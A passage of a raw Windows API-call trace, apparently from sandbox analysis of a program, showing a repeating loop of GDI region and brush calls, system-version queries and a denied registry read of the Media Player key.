0xf0401d3 [0088.131] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f00 [0088.131] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f01 [0088.131] CombineRgn (hrgnDst=0x1040f00, hrgnSrc1=0xd0401d6, hrgnSrc2=0xf0401d3, iMode=1) returned 1 [0088.131] CombineRgn (hrgnDst=0x1040f01, hrgnSrc1=0xd0401d6, hrgnSrc2=0xf0401d3, iMode=4) returned 2 [0088.131] CreateSolidBrush (color=0xff) returned 0x2100eff [0088.131] CreateSolidBrush (color=0xff0000) returned 0x1100f02 [0088.132] DeleteObject (ho=0x1100f02) returned 1 [0088.132] DeleteObject (ho=0xf0401d3) returned 1 [0088.132] DeleteObject (ho=0xd0401d6) returned 1 [0088.132] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.132] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.132] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.132] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.132] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.132] BeginPath (hdc=0x0) returned 0 [0088.132] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.132] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.132] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.132] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.132] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.132] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.132] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.132] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.132] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x100401d3 [0088.132] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe0401d6 [0088.132] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f03 [0088.132] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f04 [0088.132] CombineRgn (hrgnDst=0x1040f03, hrgnSrc1=0x100401d3, hrgnSrc2=0xe0401d6, iMode=1) returned 1 [0088.132] CombineRgn (hrgnDst=0x1040f04, hrgnSrc1=0x100401d3, hrgnSrc2=0xe0401d6, iMode=4) returned 2 [0088.132] CreateSolidBrush (color=0xff) returned 0x2100f02 [0088.132] CreateSolidBrush (color=0xff0000) returned 0x1100f05 [0088.132] DeleteObject (ho=0x1100f05) returned 1 [0088.132] DeleteObject (ho=0xe0401d6) returned 1 [0088.132] DeleteObject (ho=0x100401d3) returned 1 [0088.132] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.132] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.132] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.132] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.132] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.132] BeginPath (hdc=0x0) returned 0 [0088.132] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.133] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.133] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.133] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.133] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.133] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.133] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.133] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.166] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0401d6 [0088.166] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x110401d3 [0088.166] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f8d [0088.166] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f8e [0088.166] CombineRgn (hrgnDst=0x1040f8d, hrgnSrc1=0xf0401d6, hrgnSrc2=0x110401d3, iMode=1) returned 1 [0088.166] CombineRgn (hrgnDst=0x1040f8e, hrgnSrc1=0xf0401d6, hrgnSrc2=0x110401d3, iMode=4) returned 2 [0088.166] CreateSolidBrush (color=0xff) returned 0x2100f05 [0088.166] CreateSolidBrush (color=0xff0000) returned 0x1100f8f [0088.166] DeleteObject (ho=0x1100f8f) returned 1 [0088.166] DeleteObject (ho=0x110401d3) returned 1 [0088.166] DeleteObject (ho=0xf0401d6) returned 1 [0088.166] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.166] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.166] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.166] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.166] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.166] BeginPath (hdc=0x0) returned 0 [0088.166] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.166] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.166] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.166] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.166] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.166] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.166] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.166] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.167] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x120401d3 [0088.167] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x100401d6 [0088.167] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f90 [0088.167] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f91 [0088.167] CombineRgn (hrgnDst=0x1040f90, hrgnSrc1=0x120401d3, hrgnSrc2=0x100401d6, iMode=1) returned 1 [0088.167] CombineRgn (hrgnDst=0x1040f91, hrgnSrc1=0x120401d3, hrgnSrc2=0x100401d6, iMode=4) returned 2 [0088.167] CreateSolidBrush (color=0xff) returned 0x2100f8f [0088.167] CreateSolidBrush (color=0xff0000) returned 0x1100f92 [0088.167] DeleteObject (ho=0x1100f92) returned 1 [0088.167] DeleteObject (ho=0x100401d6) returned 1 [0088.167] DeleteObject (ho=0x120401d3) returned 1 [0088.167] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.167] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.167] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.167] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.167] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.167] BeginPath (hdc=0x0) returned 0 [0088.167] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.167] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.167] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.167] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.167] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.167] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.167] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.167] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.167] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x110401d6 [0088.167] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x130401d3 [0088.167] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f93 [0088.167] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f94 [0088.167] CombineRgn (hrgnDst=0x1040f93, hrgnSrc1=0x110401d6, hrgnSrc2=0x130401d3, iMode=1) returned 1 [0088.167] CombineRgn (hrgnDst=0x1040f94, hrgnSrc1=0x110401d6, hrgnSrc2=0x130401d3, iMode=4) returned 2 [0088.167] CreateSolidBrush (color=0xff) returned 0x2100f92 [0088.167] CreateSolidBrush (color=0xff0000) returned 0x1100f95 [0088.167] DeleteObject (ho=0x1100f95) returned 1 [0088.167] DeleteObject (ho=0x130401d3) returned 1 [0088.167] DeleteObject (ho=0x110401d6) returned 1 [0088.167] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.167] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.168] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.168] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.168] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.168] BeginPath (hdc=0x0) returned 0 [0088.168] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.168] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.168] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.168] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.168] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.168] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.168] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.168] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x140401d3 [0088.168] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x120401d6 [0088.168] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f96 [0088.168] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f97 [0088.168] CombineRgn (hrgnDst=0x1040f96, hrgnSrc1=0x140401d3, hrgnSrc2=0x120401d6, iMode=1) returned 1 [0088.168] CombineRgn (hrgnDst=0x1040f97, hrgnSrc1=0x140401d3, hrgnSrc2=0x120401d6, iMode=4) returned 2 [0088.168] CreateSolidBrush (color=0xff) returned 0x2100f95 [0088.168] CreateSolidBrush (color=0xff0000) returned 0x1100f98 [0088.168] DeleteObject (ho=0x1100f98) returned 1 [0088.168] DeleteObject (ho=0x120401d6) returned 1 [0088.168] DeleteObject (ho=0x140401d3) returned 1 [0088.168] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.168] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.168] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.168] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.168] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.168] BeginPath (hdc=0x0) returned 0 [0088.168] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.168] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.168] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.168] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.168] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.168] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.168] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.169] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x130401d6 [0088.169] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x150401d3 [0088.169] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f99 [0088.169] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f9a [0088.169] CombineRgn (hrgnDst=0x1040f99, hrgnSrc1=0x130401d6, hrgnSrc2=0x150401d3, iMode=1) returned 1 [0088.169] CombineRgn (hrgnDst=0x1040f9a, hrgnSrc1=0x130401d6, hrgnSrc2=0x150401d3, iMode=4) returned 2 [0088.169] CreateSolidBrush (color=0xff) returned 0x2100f98 [0088.169] CreateSolidBrush (color=0xff0000) returned 0x1100f9b [0088.169] DeleteObject (ho=0x1100f9b) returned 1 [0088.169] DeleteObject (ho=0x150401d3) returned 1 [0088.169] DeleteObject (ho=0x130401d6) returned 1 [0088.169] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.169] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.169] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.169] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.169] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.169] BeginPath (hdc=0x0) returned 0 [0088.169] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.169] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.169] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.169] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.169] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.169] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.169] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.169] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.169] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x160401d3 [0088.169] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x140401d6 [0088.169] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f9c [0088.169] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f9d [0088.169] CombineRgn (hrgnDst=0x1040f9c, hrgnSrc1=0x160401d3, hrgnSrc2=0x140401d6, iMode=1) returned 1 [0088.169] CombineRgn (hrgnDst=0x1040f9d, hrgnSrc1=0x160401d3, hrgnSrc2=0x140401d6, iMode=4) returned 2 [0088.169] CreateSolidBrush (color=0xff) returned 0x2100f9b [0088.169] CreateSolidBrush (color=0xff0000) returned 0x1100f9e [0088.169] DeleteObject (ho=0x1100f9e) returned 1 [0088.169] DeleteObject (ho=0x140401d6) returned 1 [0088.169] DeleteObject (ho=0x160401d3) returned 1 [0088.169] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.169] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.169] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.170] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.170] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.170] BeginPath (hdc=0x0) returned 0 [0088.170] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.170] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.170] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.170] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.170] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.170] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.170] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.170] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x150401d6 [0088.170] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x170401d3 [0088.170] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f9f [0088.170] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fa0 [0088.170] CombineRgn (hrgnDst=0x1040f9f, hrgnSrc1=0x150401d6, hrgnSrc2=0x170401d3, iMode=1) returned 1 [0088.170] CombineRgn (hrgnDst=0x1040fa0, hrgnSrc1=0x150401d6, hrgnSrc2=0x170401d3, iMode=4) returned 2 [0088.170] CreateSolidBrush (color=0xff) returned 0x2100f9e [0088.170] CreateSolidBrush (color=0xff0000) returned 0x1100fa1 [0088.170] DeleteObject (ho=0x1100fa1) returned 1 [0088.170] DeleteObject (ho=0x170401d3) returned 1 [0088.170] DeleteObject (ho=0x150401d6) returned 1 [0088.170] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.170] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.170] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.170] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.170] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.170] BeginPath (hdc=0x0) returned 0 [0088.170] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.170] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.170] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.170] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.170] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.170] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.170] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.170] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.170] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x180401d3 [0088.170] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x160401d6 [0088.170] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fa2 [0088.171] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fa3 [0088.171] CombineRgn (hrgnDst=0x1040fa2, hrgnSrc1=0x180401d3, hrgnSrc2=0x160401d6, iMode=1) returned 1 [0088.171] CombineRgn (hrgnDst=0x1040fa3, hrgnSrc1=0x180401d3, hrgnSrc2=0x160401d6, iMode=4) returned 2 [0088.171] CreateSolidBrush (color=0xff) returned 0x2100fa1 [0088.171] CreateSolidBrush (color=0xff0000) returned 0x1100fa4 [0088.171] DeleteObject (ho=0x1100fa4) returned 1 [0088.171] DeleteObject (ho=0x160401d6) returned 1 [0088.171] DeleteObject (ho=0x180401d3) returned 1 [0088.171] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, 